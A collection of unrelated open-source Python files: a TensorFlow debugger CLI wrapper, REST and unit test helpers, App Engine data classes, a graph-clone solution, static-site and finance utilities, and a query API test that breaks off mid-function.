abs path of files found (or empty)
"""
if not src.endswith('/'):
src += '/'
try:
import glob
files = glob.glob1(src, search_string)
except IndexError:
print('Cannot find {0:s} in {1:s}'.format(search_string, src))
import sys
sys.exit(2)
files = [os.path.join(src, f)
for f in files if os.path.isfile(os.path.join(src, f))]
return files
def get_dirs(src, criteria=None):
"""
Return a list of directories in src, optional simple cut by criteria.
Parameters
----------
src : str
abs path of directory to search in
criteria : str
simple if criteria in d to select within directories in src
Returns
-------
dirs : list
abs path of directories found (or empty)
"""
dirs = [os.path.join(src, l)
for l in os.listdir(src) if os.path.join(src, l)]
if criteria is not None:
dirs = [d for d in dirs if criteria in d]
return dirs
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Debugger Wrapper Session Consisting of a Local Curses-based CLI."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import shutil
import sys
import tempfile
# Google-internal import(s).
from tensorflow.python.debug.cli import analyzer_cli
from tensorflow.python.debug.cli import cli_shared
from tensorflow.python.debug.cli import debugger_cli_common
from tensorflow.python.debug.cli import stepper_cli
from tensorflow.python.debug.cli import ui_factory
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.wrappers import framework
_DUMP_ROOT_PREFIX = "tfdbg_"
class LocalCLIDebugWrapperSession(framework.BaseDebugWrapperSession):
"""Concrete subclass of BaseDebugWrapperSession implementing a local CLI.
This class has all the methods that a `session.Session` object has, in order
to support debugging with minimal code changes. Invoking its `run()` method
will launch the command-line interface (CLI) of tfdbg.
"""
def __init__(self, sess, dump_root=None, log_usage=True, ui_type="curses"):
"""Constructor of LocalCLIDebugWrapperSession.
Args:
sess: The TensorFlow `Session` object being wrapped.
dump_root: (`str`) optional path to the dump root directory. Must be a
directory that does not exist or an empty directory. If the directory
does not exist, it will be created by the debugger core during debug
`run()` calls and removed afterwards.
log_usage: (`bool`) whether the usage of this class is to be logged.
ui_type: (`str`) requested UI type. Currently supported:
(curses | readline)
Raises:
ValueError: If dump_root is an existing and non-empty directory or if
dump_root is a file.
"""
if log_usage:
pass # No logging for open-source.
framework.BaseDebugWrapperSession.__init__(self, sess)
if dump_root is None:
self._dump_root = tempfile.mktemp(prefix=_DUMP_ROOT_PREFIX)
else:
if os.path.isfile(dump_root):
raise ValueError("dump_root path points to a file: %s" % dump_root)
elif os.path.isdir(dump_root) and os.listdir(dump_root):
raise ValueError("dump_root path points to a non-empty directory: %s" %
dump_root)
self._dump_root = dump_root
self._initialize_argparsers()
# Registered tensor filters.
self._tensor_filters = {}
# Below are the state variables of this wrapper object.
# _active_tensor_filter: what (if any) tensor filter is in effect. If such
# a filter is in effect, this object will call run() method of the
# underlying TensorFlow Session object until the filter passes. This is
# activated by the "-f" flag of the "run" command.
# _run_through_times: keeps track of how many times the wrapper needs to
# run through without stopping at the run-end CLI. It is activated by the
# "-t" option of the "run" command.
# _skip_debug: keeps track of whether the current run should be executed
# without debugging. It is activated by the "-n" option of the "run"
# command.
#
# _run_start_response: keeps track what OnRunStartResponse the wrapper
# should return at the next run-start callback. If this information is
# unavailable (i.e., is None), the run-start CLI will be launched to ask
# the user. This is the case, e.g., right before the first run starts.
self._active_tensor_filter = None
self._run_through_times = 1
self._skip_debug = False
self._run_start_response = None
self._ui_type = ui_type
def _initialize_argparsers(self):
self._argparsers = {}
ap = argparse.ArgumentParser(
description="Run through, with or without debug tensor watching.",
usage=argparse.SUPPRESS)
ap.add_argument(
"-t",
"--times",
dest="times",
type=int,
default=1,
help="How many Session.run() calls to proceed with.")
ap.add_argument(
"-n",
"--no_debug",
dest="no_debug",
action="store_true",
help="Run through without debug tensor watching.")
ap.add_argument(
"-f",
"--till_filter_pass",
dest="till_filter_pass",
type=str,
default="",
help="Run until a tensor in the graph passes the specified filter.")
self._argparsers["run"] = ap
ap = argparse.ArgumentParser(
description="Invoke stepper (cont, step, breakpoint, etc.)",
usage=argparse.SUPPRESS)
self._argparsers["invoke_stepper"] = ap
ap = argparse.ArgumentParser(
description="Display information about this Session.run() call.",
usage=argparse.SUPPRESS)
self._argparsers["run_info"] = ap
def add_tensor_filter(self, filter_name, tensor_filter):
"""Add a tensor filter.
Args:
filter_name: (`str`) name of the filter.
tensor_filter: (`callable`) the filter callable. See the doc string of
`DebugDumpDir.find()` for more details about its signature.
"""
self._tensor_filters[filter_name] = tensor_filter
def on_session_init(self, request):
"""Overrides on-session-init callback.
Args:
request: An instance of `OnSessionInitRequest`.
Returns:
An instance of `OnSessionInitResponse`.
"""
return framework.OnSessionInitResponse(
framework.OnSessionInitAction.PROCEED)
def on_run_start(self, request):
"""Overrides on-run-start callback.
Invoke the CLI to let user choose what action to take:
`run` / `invoke_stepper`.
Args:
request: An instance of `OnSessionInitRequest`.
Returns:
An instance of `OnSessionInitResponse`.
Raises:
RuntimeError: If user chooses to prematurely exit the debugger.
"""
self._update_run_calls_state(request.run_call_count, request.fetches,
request.feed_dict)
if self._active_tensor_filter:
# If we are running till a filter passes, we just need to keep running
# with the DEBUG_RUN option.
return framework.OnRunStartResponse(framework.OnRunStartAction.DEBUG_RUN,
self._get_run_debug_urls())
if self._run_call_count > 1 and not self._skip_debug:
if self._run_through_times > 0:
# Just run through without debugging.
return framework.OnRunStartResponse(
framework.OnRunStartAction.NON_DEBUG_RUN, [])
elif self._run_through_times == 0:
# It is the run at which the run-end CLI will be launched: activate
# debugging.
return framework.OnRunStartResponse(
framework.OnRunStartAction.DEBUG_RUN,
self._get_run_debug_urls())
if self._run_start_response is None:
self._prep_cli_for_run_start()
self._run_start_response = self._launch_cli(is_run_start=True)
if self._run_through_times > 1:
self._run_through_times -= 1
if self._run_start_response == debugger_cli_common.EXPLICIT_USER_EXIT:
# Explicit user "exit" command leads to sys.exit(1).
print(
"Note: user exited from debugger CLI: Calling sys.exit(1).",
file=sys.stderr)
sys.exit(1)
return self._run_start_response
def _prep_cli_for_run_start(self):
"""Prepare (but not launch) the CLI for run-start."""
self._run_cli = ui_factory.get_ui(self._ui_type)
help_intro = debugger_cli_common.RichTextLines([])
if self._run_call_count == 1:
# Show logo at the onset of the first run.
help_intro.extend(cli_shared.get_tfdbg_logo())
help_intro.extend(debugger_cli_common.RichTextLines("Upcoming run:"))
help_intro.extend(self._run_info)
self._run_cli.set_help_intro(help_intro)
# Create initial screen output detailing the run.
self._title = "run-start: " + self._run_description
self._init_command = "run_info"
self._title_color = "blue_on_white"
def on_run_end(self, request):
"""Overrides on-run-end callback.
Actions taken:
1) Load the debug dump.
2) Bring up the Analyzer CLI.
Args:
request: An instance of OnSessionInitRequest.
Returns:
An instance of OnSessionInitResponse.
"""
if request.performed_action == framework.OnRunStartAction.DEBUG_RUN:
partition_graphs = None
if request.run_metadata and request.run_metadata.partition_graphs:
partition_graphs = request.run_metadata.partition_graphs
elif request.client_graph_def:
partition_graphs = [request.client_graph_def]
debug_dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=partition_graphs)
debug_dump.set_python_graph(self._sess.graph)
passed_filter = None
if self._active_tensor_filter:
if not debug_dump.find(
self._tensor_filters[self._active_tensor_filter], first_n=1):
# No dumped tensor passes the filter in this run. Clean up the dump
# directory and move on.
self._remove_dump_root()
return framework.OnRunEndResponse()
else:
# Some dumped tensor(s) from this run passed the filter.
passed_filter = self._active_tensor_filter
self._active_tensor_filter = None
self._prep_cli_for_run_end(debug_dump, request.tf_error, passed_filter)
self._run_start_response = self._launch_cli()
# Clean up the dump generated by this run.
self._remove_dump_root()
else:
# No debug information to show following a non-debug run() call.
self._run_start_response = None
# Return placeholder response that currently holds no additional
# information.
return framework.OnRunEndResponse()
def _remove_dump_root(self):
if os.path.isdir(self._dump_root):
shutil.rmtree(self._dump_root)
def _prep_cli_for_run_end(self, debug_dump, tf_error, passed_filter):
"""Prepare (but not launch) CLI for run-end, with debug dump from the run.
Args:
debug_dump: (debug_data.DebugDumpDir) The debug dump directory from this
run.
tf_error: (None or OpError) OpError that happened during the run() call
(if any).
passed_filter: (None or str) Name of the tensor filter that just passed
and caused the preparation of this run-end CLI (if any).
"""
if tf_error:
help_intro = cli_shared.get_error_intro(tf_error)
self._init_command = "help"
self._title_color = "red_on_white"
else:
help_intro = None
self._init_command = "lt"
self._title_color = "black_on_white"
if passed_filter is not None:
# Some dumped tensor(s) from this run passed the filter.
self._init_command = "lt -f %s" % passed_filter
self._title_color = "red_on_white"
self._run_cli = analyzer_cli.create_analyzer_ui(
debug_dump, self._tensor_filters, ui_type=self._ui_type)
# Get names of all dumped tensors.
dumped_tensor_names = []
for datum in debug_dump.dumped_tensor_data:
dumped_tensor_names.append("%s:%d" %
(datum.node_name, datum.output_slot))
# Tab completions for command "print_tensors".
self._run_cli.register_tab_comp_context(["print_tensor", "pt"],
dumped_tensor_names)
# Tab completion for commands "node_info", "list_inputs" and
# "list_outputs". The list comprehension is used below because nodes()
# output can be unicodes and they need to be converted to strs.
self._run_cli.register_tab_comp_context(
["node_info", "ni", "list_inputs", "li", "list_outputs", "lo"],
[str(node_name) for node_name in debug_dump.nodes()])
# TODO(cais): Reduce API surface area for aliases vis-a-vis tab
# completion contexts and registered command handlers.
self._title = "run-end: " + self._run_description
if help_intro:
self._run_cli.set_help_intro(help_intro)
def _launch_cli(self, is_run_start=False):
"""Launch the interactive command-line interface.
Args:
is_run_start: (bool) whether this CLI launch occurs at a run-start
callback.
Returns:
The OnRunStartResponse specified by the user using the "run" command.
"""
self._register_this_run_info(self._run_cli)
response = self._run_cli.run_ui(
init_command=self._init_command,
title=self._title,
title_color=self._title_color)
return response
def _run_info_handler(self, args, screen_info=None):
output = self._run_info
# Add main menu.
menu = debugger_cli_common.Menu()
menu.append(debugger_cli_common.MenuItem("list_tensors", "lt"))
menu.append(debugger_cli_common.MenuItem("help", "help"))
output.annotations[debugger_cli_common.MAIN_MENU_KEY] = menu
return output
def _run_handler(self, args, screen_info=None):
"""Command handler for "run" command during on-run-start."""
_ = screen_info # Currently unused.
parsed = self._argparsers["run"].parse_args(args)
if parsed.till_filter_pass:
# For the run-till-bad-numerical-value-appears mode, use the DEBUG_RUN
# option to access the intermediate tensors, and set the corresponding
# state flag of the class itself to True.
if parsed.till_filter_pass in self._tensor_filters:
action = framework.OnRunStartAction.DEBUG_RUN
self._active_tensor_filter = parsed.till_filter_pass
else:
# Handle invalid filter name.
return debugger_cli_common.RichTextLines(
["ERROR: tensor filter \"%s\" does not exist." %
parsed.till_filter_pass])
self._skip_debug = parsed.no_debug
self._run_through_times = parsed.times
if parsed.times > 1 or parsed.no_debug:
# If requested -t times > 1, the very next run will be a non-debug run.
action = framework.OnRunStartAction.NON_DEBUG_RUN
debug_urls = []
else:
action = framework.OnRunStartAction.DEBUG_RUN
debug_urls = self._get_run_debug_urls()
# Raise CommandLineExit exception to cause the CLI to exit.
raise debugger_cli_common.CommandLineExit(
exit_token=framework.OnRunStartResponse(action, debug_urls))
def _register_this_run_info(self, curses_cli):
curses_cli.register_command_handler(
"run",
self._run_handler,
self._argparsers["run"].format_help(),
prefix_aliases=["r"])
curses_cli.register_command_handler(
"invoke_stepper",
self._on_run_start_step_handler,
self._argparsers["invoke_stepper"].format_help(),
prefix_aliases=["s"])
curses_cli.register_command_handler(
"run_info",
self._run_info_handler,
self._argparsers["run_info"].format_help(),
prefix_aliases=["ri"])
if self._tensor_filters:
# Register tab completion for the filter names.
curses_cli.register_tab_comp_context(["run", "r"],
list(self._tensor_filters.keys()))
def _on_run_start_step_handler(self, args, screen_info=None):
"""Command handler for "invoke_stepper" command during on-run-start."""
_ = screen_info # Currently unused.
# No parsing is currently necessary for invoke_stepper. This may change
# in the future when the command has arguments.
# Raise CommandLineExit exception to cause the CLI to exit.
raise debugger_cli_common.CommandLineExit(
exit_token=framework.OnRunStartResponse(
framework.OnRunStartAction.INVOKE_STEPPER, []))
def _get_run_debug_urls(self):
"""Get the debug_urls value for the current run() call.
Returns:
debug_urls: (list of str) Debug URLs for the current run() call.
Currently, the list consists of only one URL that is a file:// URL.
"""
return ["file://" + self._dump_root]
def _update_run_calls_state(self, run_call_count, fetches, feed_dict):
"""Update the internal state with regard to run() call history.
Args:
run_call_count: (int) Number of run() calls that have occurred.
fetches: a node/tensor or a list of node/tensor that are the fetches of
the run() call. This is the same as the fetches argument to the run()
call.
feed_dict: None of a dict. This is the feed_dict argument to the run()
call.
"""
self._run_call_count = run_call_count
self._run_description = cli_shared.get_run_short_description(run_call_count,
fetches,
feed_dict)
self._run_through_times -= 1
self._run_info = cli_shared.get_run_start_intro(run_call_count,
fetches,
feed_dict,
self._tensor_filters)
def invoke_node_stepper(self,
node_stepper,
restore_variable_values_on_exit=True):
"""Overrides method in base class to implement interactive node stepper.
Args:
node_stepper: (`stepper.NodeStepper`) The underlying NodeStepper API
object.
restore_variable_values_on_exit: (`bool`) Whether any variables whose
values have been altered during this node-stepper invocation should be
restored to their old values when this invocation ends.
Returns:
The same return values as the `Session.run()` call on the same fetches as
the NodeStepper.
"""
stepper = stepper_cli.NodeStepperCLI(node_stepper)
# On exiting the node-stepper CLI, the finalize method of the node_stepper
# object will be called, ensuring that the state of the graph will be the
# same as if the stepping did not happen.
# TODO(cais): Perhaps some users will want the effect of the interactive
# stepping and value injection to persist. When that happens, make the call
# to finalize optional.
stepper_ui = ui_factory.get_ui(
self._ui_type,
on_ui_exit=(node_stepper.restore_variable_values if
restore_variable_values_on_exit else None))
stepper_ui.register_command_handler(
"list_sorted_nodes",
stepper.list_sorted_nodes,
stepper.arg_parsers["list_sorted_nodes"].format_help(),
prefix_aliases=["lt", "lsn"])
stepper_ui.register_command_handler(
"cont",
stepper.cont,
stepper.arg_parsers["cont"].format_help(),
prefix_aliases=["ct", "c"])
stepper_ui.register_command_handler(
"step",
stepper.step,
stepper.arg_parsers["step"].format_help(),
prefix_aliases=["st", "s"])
stepper_ui.register_command_handler(
"print_tensor",
stepper.print_tensor,
stepper.arg_parsers["print_tensor"].format_help(),
prefix_aliases=["pt"])
stepper_ui.register_command_handler(
"inject_value",
stepper.inject_value,
stepper.arg_parsers["inject_value"].format_help(),
prefix_aliases=["inject", "override_value", "override"])
# Register tab completion candidates.
stepper_ui.register_tab_comp_context([
"cont", "ct", "c", "pt", "inject_value", "inject", "override_value",
"override"
], [str(elem) for elem in node_stepper.sorted_nodes()])
# TODO(cais): Tie up register_tab_comp_context to a single alias to shorten
# calls like this.
return stepper_ui.run_ui(
init_command="lt",
title="Node Stepper: " + self._run_description,
title_color="blue_on_white")
|
#########
# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import tempfile
import os
import shutil
from manager_rest.test.base_test import BaseServerTestCase
from wagon.wagon import Wagon
class BaseListTest(BaseServerTestCase):
def _put_deployment_modification(self, deployment_id,
modified_nodes=None,
node_instances=None,
nodes=None):
resource_path = '/deployment-modifications'
data = {'deployment_id': deployment_id,
'modified_nodes': modified_nodes or {},
'node_instances': node_instances or {},
'nodes': nodes or {}}
return self.post(resource_path, data).json
def _mark_deployment_modification_finished(self, modification_id=None):
resource_path = '/deployment-modifications/{0}/finish'.format(
modification_id)
data = {'modification_id': modification_id}
return self.post(resource_path, data).json
def _put_n_deployment_modifications(self, id_prefix,
number_of_modifications,
skip_creation=None):
self._put_n_deployments(id_prefix,
number_of_modifications,
skip_creation=skip_creation,
add_modification=True)
def _put_n_plugins(self, number_of_plugins):
for i in range(0, number_of_plugins):
tmpdir = tempfile.mkdtemp(prefix='test-pagination-')
with open(os.path.join(tmpdir, 'setup.py'), 'w') as f:
f.write('from setuptools import setup\n')
f.write('setup(name="some-package", version={0})'.format(i))
wagon = Wagon(tmpdir)
plugin_path = wagon.create(archive_destination_dir=tmpdir)
self.post_file('/plugins', plugin_path)
shutil.rmtree(tmpdir)
def _put_n_deployments(self, id_prefix,
number_of_deployments,
skip_creation=None,
add_modification=None):
for i in range(0, number_of_deployments):
deployment_id = "{0}{1}_{2}".format(id_prefix, str(i),
'deployment')
blueprint_id = "{0}{1}_{2}".format(id_prefix, str(i), 'blueprint')
if not skip_creation:
self.put_deployment(deployment_id=deployment_id,
blueprint_id=blueprint_id)
if add_modification:
response = self._put_deployment_modification(
deployment_id=deployment_id)
self._mark_deployment_modification_finished(
modification_id=response['id'])
def _put_n_snapshots(self, number_of_snapshots):
for i in range(number_of_snapshots):
self.client.snapshots.create(snapshot_id='oh-snap{0}'.format(i),
include_metrics=False,
include_credentials=False)
|
# -*- coding: utf-8 -*-
# Copyright 2020 Green Valley Belgium NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.7@@
from google.appengine.ext import db
from mcfw.properties import long_property, typed_property, unicode_property
GEO_POINT_FACTOR = 1000000.0
class GeoPointTO(object):
latitude = long_property('1')
longitude = long_property('2')
accuracy = long_property('3')
@property
def latitude_degrees(self):
return self.latitude / GEO_POINT_FACTOR
@property
def longitude_degrees(self):
return self.longitude / GEO_POINT_FACTOR
def toGeoPoint(self):
return db.GeoPt(self.latitude / GEO_POINT_FACTOR, self.longitude / GEO_POINT_FACTOR)
@staticmethod
def fromGeoPoint(geoPoint):
to = GeoPointTO()
to.latitude = int(geoPoint.lat * GEO_POINT_FACTOR)
to.longitude = int(geoPoint.lon * GEO_POINT_FACTOR)
return to
@staticmethod
def fromLocation(location):
to = GeoPointTO.fromGeoPoint(location.geoPoint)
to.accuracy = location.geoAccuracy
return to
class GeoPointWithTimestampTO(GeoPointTO):
timestamp = long_property('100')
@staticmethod
def fromLocation(location):
to = GeoPointWithTimestampTO()
to.latitude = int(location.geoPoint.lat * GEO_POINT_FACTOR)
to.longitude = int(location.geoPoint.lon * GEO_POINT_FACTOR)
to.accuracy = location.accuracy
to.timestamp = location.timestamp
return to
class CellTowerTO(object):
cid = long_property('1')
strength = long_property('2')
class RawLocationInfoTO(object):
cid = long_property('1')
lac = long_property('2')
net = long_property('3')
mobileDataType = long_property('5')
signalStrength = long_property('6')
class CallRecordTO(object):
id = long_property('1')
phoneNumber = unicode_property('2')
duration = long_property('3')
type = long_property('4')
starttime = long_property('5')
countrycode = unicode_property('6')
geoPoint = typed_property('7', GeoPointTO, False)
rawLocation = typed_property('8', RawLocationInfoTO, False)
class LocationRecordTO(object):
timestamp = long_property('1')
geoPoint = typed_property('2', GeoPointTO, False)
rawLocation = typed_property('3', RawLocationInfoTO, False)
class LogCallRequestTO(object):
record = typed_property('1', CallRecordTO, False)
class LogCallResponseTO(object):
recordId = long_property('1')
class LogLocationRecipientTO(object):
friend = unicode_property('1')
target = long_property('2')
class LogLocationsRequestTO(object):
records = typed_property('1', LocationRecordTO, True)
recipients = typed_property('2', LogLocationRecipientTO, True)
class LogLocationsResponseTO(object):
pass
class ReportObjectionableContentRequestTO(object):
TYPE_NEWS = u'news'
type = unicode_property('1')
object = unicode_property('2')
reason = unicode_property('3')
class ReportObjectionableContentResponseTO(object):
pass
|
# Definition for a undirected graph node
# class UndirectedGraphNode(object):
# def __init__(self, x):
# self.label = x
# self.neighbors = []
class Solution(object):
# def __init__(self):
# self.label_map = {}
# def cloneGraph(self, node):
# """
# :type node: UndirectedGraphNode
# :rtype: UndirectedGraphNode
# """
# # DFS
# if node is None:
# return None
# res = UndirectedGraphNode(node.label)
# self.label_map[node.label] = res
# for ne in node.neighbors:
# if ne.label not in self.label_map:
# res.neighbors.append(self.cloneGraph(ne))
# else:
# res.neighbors.append(self.label_map[ne.label])
# return res
def cloneGraph(self, node):
# BFS
if node is None:
return None
label_map = {}
queue = [node]
graphCopy = UndirectedGraphNode(node.label)
label_map[node.label] = graphCopy
while len(queue) > 0:
curr = queue.pop(0)
for ne in curr.neighbors:
if ne.label in label_map:
label_map[curr.label].neighbors.append(label_map[ne.label])
else:
neighborCopy = UndirectedGraphNode(ne.label)
label_map[curr.label].neighbors.append(neighborCopy)
label_map[ne.label] = neighborCopy
queue.append(ne)
return graphCopy
|
import os
import re
import subprocess
from urllib.parse import urljoin
from tornado.util import ObjectDict
from catsup.logger import logger
HTML_TAG_RE = re.compile("<.*?>")
def html_to_raw_text(html):
return "".join(HTML_TAG_RE.split(html))
def static_url(f):
from catsup.options import g
caches_class = g.generator.caches["static_url"]
if f not in caches_class:
import os
import hashlib
def get_hash(path):
path = os.path.join(g.theme.path, "static", path)
if not os.path.exists(path):
logger.warn("%s does not exist." % path)
return
with open(path, "rb") as f:
return hashlib.md5(f.read()).hexdigest()
hsh = get_hash(f)
url = urljoin(g.static_prefix, "%s?v=%s" % (f, hsh))
caches_class[f] = url
return caches_class[f]
def url_for(obj):
from catsup.options import g
caches_class = g.generator.caches["url_for"]
key = id(obj)
if key not in caches_class:
from catsup.models import CatsupPage
url = ""
if obj == "index":
url = g.base_url
elif isinstance(obj, CatsupPage):
url = obj.permalink
elif isinstance(obj, str):
url = g.permalink[obj]
caches_class[key] = urljoin(g.base_url, url)
return caches_class[key]
def to_unicode(value):
if isinstance(value, str):
return value
if isinstance(value, int):
return str(value)
if isinstance(value, bytes):
return value.decode("utf-8")
return value
def update_nested_dict(a, b):
for k, v in b.items():
if isinstance(v, dict):
d = a.setdefault(k, ObjectDict())
update_nested_dict(d, v)
else:
a[k] = v
return a
def call(cmd, silence=True, **kwargs):
from catsup.options import g
kwargs.setdefault("cwd", g.cwdpath)
if silence:
kwargs.setdefault("stdout", subprocess.PIPE)
kwargs.setdefault("shell", True)
return subprocess.call(cmd, **kwargs)
def mkdir(path):
if not os.path.exists(path):
os.makedirs(path)
def smart_copy(source, target):
if not os.path.exists(source):
return
def copy_file(source, target):
if os.path.exists(target):
if os.path.getsize(source) == os.path.getsize(target):
return
mkdir(os.path.dirname(target))
open(target, "wb").write(open(source, "rb").read())
if os.path.isfile(source):
return copy_file(source, target)
for f in os.listdir(source):
sourcefile = os.path.join(source, f)
targetfile = os.path.join(target, f)
if os.path.isfile(sourcefile):
copy_file(sourcefile, targetfile)
else:
smart_copy(sourcefile, targetfile)
class Pagination(object):
def __init__(self, page, posts, per_page, get_permalink):
self.total_items = posts
self.page = page
self.per_page = per_page
self.get_permalink = get_permalink
def iter_pages(self, edge=4):
if self.page <= edge:
return range(1, min(self.pages, 2 * edge + 1) + 1)
if self.page + edge > self.pages:
return range(max(self.pages - 2 * edge, 1), self.pages + 1)
return range(self.page - edge, min(self.pages, self.page + edge) + 1)
@property
def pages(self):
return int((self.total - 1) / self.per_page) + 1
@property
def has_prev(self):
return self.page > 1
@property
def prev_permalink(self):
return self.get_permalink(self.prev_num)
@property
def prev_num(self):
return self.page - 1
@property
def has_next(self):
return self.page < self.pages
@property
def next_permalink(self):
return self.get_permalink(self.next_num)
@property
def next_num(self):
return self.page + 1
@property
def total(self):
return len(self.total_items)
@property
def items(self):
start = (self.page - 1) * self.per_page
end = self.page * self.per_page
return self.total_items[start:end]
|
"""
util.py
General constants and functions that will be used throughout the package.
"""
import numpy as np
import pandas as pd
# Constants
# ------------------------------------------------------------------------------------------------------------------------------
# Display constants
COL_DASH_WIDTH = 128
# Time constants
DEFAULT_INITIAL_PRICE = 100.0
DAYS_IN_YEAR = 365.25
DAYS_IN_TRADING_YEAR = 252.0
MONTHS_IN_YEAR = 12.0
# Percent Constants
RISK_FREE_RATE = 0.01
# Trading Signal Constants
FIBONACCI_DECIMAL = np.array([0, 0.236, 0.382, 0.5, 0.618, 1])
FIBONACCI_SEQUENCE = [0, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233]
RANK_DAYS_IN_TRADING_YEAR = [200, 125, 50, 20, 3, 14]
RANK_PERCENTS = [0.3, 0.3, 0.15, 0.15, 0.5, 0.5]
# Number Formater Functions
# ------------------------------------------------------------------------------------------------------------------------------
def fmtp(x):
"""
Format as percent.
"""
return '-' if np.isnan(x) else format(x, '.2%')
def fmtpn(x):
"""
Format as percent without the sign.
"""
return '-' if np.isnan(x) else format(100.0 * x, '.2f')
def fmtn(x):
"""
Format as float.
"""
return '-' if np.isnan(x) else format(x, '.2f')
def fmttn(x):
"""
Format as text notation float (Thousand, Million, Billion, etc.).
"""
abs_x = abs(x)
if np.isnan(x):
return '-'
elif abs_x < 1e3:
return '{:0.2f}'.format(x)
elif 1e3 <= abs_x < 1e6:
return '{:0.2f} k'.format(x / 1e3)
elif 1e6 <= abs_x < 1e9:
return '{:0.2f} M'.format(x / 1e6)
elif 1e9 <= abs_x < 1e12:
return '{:0.2f} B'.format(x / 1e9)
elif abs_x >= 1e12:
return '{:0.2f} T'.format(x / 1e12)
# Number Parser Functions
# ------------------------------------------------------------------------------------------------------------------------------
def prsp(x):
"""
Parse string as percent.
"""
return np.nan if x is '-' else float(x.replace('%', '')) / 100.0
def prspn(x):
"""
Parse string as percent without sign.
"""
return np.nan if x is '-' else float(x) / 100.0
def prsn(x):
"""
Parse string as float.
"""
return np.nan if x is '-' else float(x)
def prstn(x):
"""
Parse text notation string
"""
try:
if x.strip().endswith('T'):
return float(x[:-1]) * 1e12
elif x.strip().endswith('B'):
return float(x[:-1]) * 1e9
elif x.strip().endswith('M'):
return float(x[:-1]) * 1e6
elif x.strip().lower().endswith('k'):
return float(x[:-1]) * 1e3
else:
return float(x)
except ValueError:
return np.nan
# General Price Helper Functions
# ------------------------------------------------------------------------------------------------------------------------------
def sma(x, n=20):
"""
Return simple moving average pandas data, x, over interval, n.
"""
return pd.rolling_mean(x, n)
def ema(x, n=20):
"""
Return exponential moving average pandas data, x, over interval, n.
"""
return pd.ewma(x, n)
def calc_returns(x):
"""
Calculate arithmetic returns of price series.
"""
return x / x.shift(1) - 1.0
def calc_log_returns(x):
"""
Calculate log returns of price series.
"""
return np.log(x / x.shift(1))
def calc_price(x, x0=DEFAULT_INITIAL_PRICE):
"""
Calculate price from returns series.
"""
return (x.replace(to_replace=np.nan, value=0) + 1.0).cumprod() * x0
def calc_cagr(x):
"""
Calculate compound annual growth rate.
"""
start = x.index[0]
end = x.index[-1]
return np.power((x.ix[-1] / x.ix[0]), 1.0 / ((end - start).days / DAYS_IN_YEAR)) - 1.0
def rebase_price(x, x0=DEFAULT_INITIAL_PRICE):
"""
Convert a series to another initial price.
"""
return x0 * x / x.ix[0]
# General Number Helper Functions
# ------------------------------------------------------------------------------------------------------------------------------
def scale(x, (xmin, xmax), (ymin, ymax)):
"""
Scale a number from one range to antoher range, clipping values that are out of bounds.
"""
# Ensure everything is a float
x = float(x)
xmin = float(xmin)
xmax = float(xmax)
ymin = float(ymin)
ymax = float(ymax)
# Scale input while handling bounds
if x < xmin:
return ymin
elif x > xmax:
return ymax
else:
return ((ymax - ymin) * (x - xmin) / (xmax - xmin)) + ymin
|
import clusto
from clusto.test import testbase
from clusto.drivers import *
from clusto.drivers.resourcemanagers.simplenummanager import *
class SimpleNumManagerTests(testbase.ClustoTestBase):
def data(self):
n1 = SimpleNumManager('numgen1', next=1)
n2 = SimpleNumManager('numgen2', maxnum=4, next=0)
clusto.flush()
def testAllocateNum(self):
ngen = clusto.get_by_name('numgen1')
d = Driver('foo')
s1 = ngen.allocate(d)
s2 = ngen.allocate(d)
s3 = ngen.allocate(d)
s4 = ngen.allocate(d)
self.assertEqual(ngen.owners(1), [d])
self.assertEqual(ngen.owners(2), [d])
self.assertEqual(ngen.owners(3), [d])
self.assertEqual(ngen.owners(4), [d])
def testAllocateMaxNum(self):
d = Driver('foo')
ngen = clusto.get_by_name('numgen2')
s1 = ngen.allocate(d)
s1 = ngen.allocate(d)
s1 = ngen.allocate(d)
s1 = ngen.allocate(d)
s1 = ngen.allocate(d)
self.assertRaises(SimpleNumManagerException, ngen.allocate, d)
|
# coding: utf-8
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Tests for /query api endpoint."""
from datetime import datetime
from operator import itemgetter
from flask import json
from nose.plugins.skip import SkipTest
from ggrc import db
from ggrc.models import CustomAttributeDefinition as CAD
from integration.ggrc.converters import TestCase
from integration.ggrc.models import factories
# to be moved into converters.query_helper
DATE_FORMAT_REQUEST = "%m/%d/%Y"
DATE_FORMAT_RESPONSE = "%Y-%m-%d"
# pylint: disable=super-on-old-class; false positive
class BaseQueryAPITestCase(TestCase):
"""Base class for /query api tests with utility methods."""
def setUp(self):
"""Log in before performing queries."""
# we don't call super as TestCase.setUp clears the DB
# super(BaseQueryAPITestCase, self).setUp()
self.client.get("/login")
def _post(self, data):
"""Make a POST to /query endpoint."""
if not isinstance(data, list):
data = [data]
headers = {"Content-Type": "application/json", }
return self.client.post("/query", data=json.dumps(data), headers=headers)
def _get_first_result_set(self, data, *keys):
"""Post data, get response, get values from it like in obj["a"]["b"]."""
response = self._post(data)
self.assert200(response)
result = json.loads(response.data)[0]
for key in keys:
